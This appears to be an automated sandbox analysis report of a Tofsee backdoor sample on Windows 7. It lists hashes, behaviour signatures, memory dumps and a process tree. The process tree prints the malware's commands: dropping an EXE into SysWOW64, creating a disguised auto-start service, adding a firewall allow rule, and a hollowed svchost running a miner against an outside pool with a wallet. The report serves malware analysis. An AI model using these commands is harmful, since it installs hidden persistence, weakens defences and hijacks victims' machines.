Analysis

  • max time kernel
    142s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-11-2020 15:32

General

  • Target

    f432d10722a919cc0054d2036ca3869473d30ff1bea118a5951e1d0f9b312683.exe

  • Size

    13.1MB

  • MD5

    b0b80979e13efa87be2e305a86c0cd65

  • SHA1

    9f0fa2d99d19c5815b442bafec74b9781f0584b2

  • SHA256

    f432d10722a919cc0054d2036ca3869473d30ff1bea118a5951e1d0f9b312683

  • SHA512

    4d8a2069de3d9bb4ed2d34f29b18dc124b497749f065d74bba93c986d605bab298fed6dbb3eb1142a04f8269b05c8a2c1cf864de4576bfb01d2b824ee1aeb4e6

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f432d10722a919cc0054d2036ca3869473d30ff1bea118a5951e1d0f9b312683.exe
    "C:\Users\Admin\AppData\Local\Temp\f432d10722a919cc0054d2036ca3869473d30ff1bea118a5951e1d0f9b312683.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:932
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qqrhyfnj\
      2⤵
        PID:1760
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fioixitz.exe" C:\Windows\SysWOW64\qqrhyfnj\
        2⤵
          PID:2044
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create qqrhyfnj binPath= "C:\Windows\SysWOW64\qqrhyfnj\fioixitz.exe /d\"C:\Users\Admin\AppData\Local\Temp\f432d10722a919cc0054d2036ca3869473d30ff1bea118a5951e1d0f9b312683.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:920
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description qqrhyfnj "wifi internet conection"
            2⤵
              PID:1564
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start qqrhyfnj
              2⤵
                PID:1588
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                • Modifies service
                PID:556
            • C:\Windows\SysWOW64\qqrhyfnj\fioixitz.exe
              C:\Windows\SysWOW64\qqrhyfnj\fioixitz.exe /d"C:\Users\Admin\AppData\Local\Temp\f432d10722a919cc0054d2036ca3869473d30ff1bea118a5951e1d0f9b312683.exe"
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:268
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                2⤵
                • Deletes itself
                • Drops file in System32 directory
                • Modifies service
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:1064
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1360

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\fioixitz.exe
              MD5

              794d0db7a8ffe73235c1d7225485f32e

              SHA1

              2382544566eb7bbd59b301a1cfd425b3bdfffaa0

              SHA256

              b31504a7e1d7bfabecfdf1ba997506d4421cbb29658861110d447a2a9eab9756

              SHA512

              05c3aa5998543bc8931c1ab8ced34ae9b7d4cb66e39d0221f8b73d0b57db33869e5ff19c5bb96a2fb6028fbc8dbaba223a752f34f27ed54d21fa276f08dd756d

            • C:\Windows\SysWOW64\qqrhyfnj\fioixitz.exe
              MD5

              794d0db7a8ffe73235c1d7225485f32e

              SHA1

              2382544566eb7bbd59b301a1cfd425b3bdfffaa0

              SHA256

              b31504a7e1d7bfabecfdf1ba997506d4421cbb29658861110d447a2a9eab9756

              SHA512

              05c3aa5998543bc8931c1ab8ced34ae9b7d4cb66e39d0221f8b73d0b57db33869e5ff19c5bb96a2fb6028fbc8dbaba223a752f34f27ed54d21fa276f08dd756d

            • memory/268-11-0x0000000000F10000-0x0000000000F21000-memory.dmp
              Filesize

              68KB

            • memory/268-10-0x0000000000E35000-0x0000000000E36000-memory.dmp
              Filesize

              4KB

            • memory/556-9-0x0000000000000000-mapping.dmp
            • memory/920-5-0x0000000000000000-mapping.dmp
            • memory/932-0-0x0000000000D85000-0x0000000000D86000-memory.dmp
              Filesize

              4KB

            • memory/932-1-0x0000000000FE0000-0x0000000000FF1000-memory.dmp
              Filesize

              68KB

            • memory/1064-19-0x00000000057D0000-0x0000000005BDB000-memory.dmp
              Filesize

              4.0MB

            • memory/1064-16-0x00000000000E0000-0x00000000000E6000-memory.dmp
              Filesize

              24KB

            • memory/1064-20-0x0000000000470000-0x0000000000477000-memory.dmp
              Filesize

              28KB

            • memory/1064-18-0x0000000000210000-0x0000000000215000-memory.dmp
              Filesize

              20KB

            • memory/1064-12-0x00000000000C0000-0x00000000000D5000-memory.dmp
              Filesize

              84KB

            • memory/1064-13-0x00000000000C9A6B-mapping.dmp
            • memory/1064-15-0x0000000001B80000-0x0000000001D8F000-memory.dmp
              Filesize

              2.1MB

            • memory/1064-17-0x0000000000200000-0x0000000000210000-memory.dmp
              Filesize

              64KB

            • memory/1360-21-0x0000000000190000-0x0000000000281000-memory.dmp
              Filesize

              964KB

            • memory/1360-22-0x0000000000190000-0x0000000000281000-memory.dmp
              Filesize

              964KB

            • memory/1360-24-0x000000000022259C-mapping.dmp
            • memory/1564-6-0x0000000000000000-mapping.dmp
            • memory/1588-7-0x0000000000000000-mapping.dmp
            • memory/1760-2-0x0000000000000000-mapping.dmp
            • memory/2044-3-0x0000000000000000-mapping.dmp